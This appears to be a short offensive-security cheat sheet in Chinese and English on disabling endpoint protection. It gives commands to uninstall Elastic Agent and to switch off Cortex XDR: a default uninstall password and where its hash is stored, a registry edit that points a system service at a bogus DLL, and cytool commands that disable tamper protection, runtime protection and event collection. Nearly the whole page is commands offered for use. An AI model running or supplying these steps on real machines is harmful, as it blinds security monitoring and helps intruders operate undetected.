关闭防病毒软件
https://github.com/ayeskatalas/Sophos-Removal-Tool/https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.htmlhttps://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html
cd "C:\Program Files\Elastic\Agent\"
PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall
Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
Elastic Agent has been uninstalled.https://mrd0x.com/cortex-xdr-analysis-and-bypass/
卸载密码:Password1
Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db
Look for PasswordHash, PasswordSalt or password, salt strings.
禁用Cortex:将DLL改成随机值,然后重启
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f
启动时禁用,重启生效
cytool.exe startup disable
禁用对 Cortex XDR 文件、进程、注册表和服务的保护
cytool.exe protect disable
禁用 Cortex XDR(即使启用了篡改保护)
cytool.exe runtime disable
禁用事件收集
cytool.exe event_collection disable最后更新于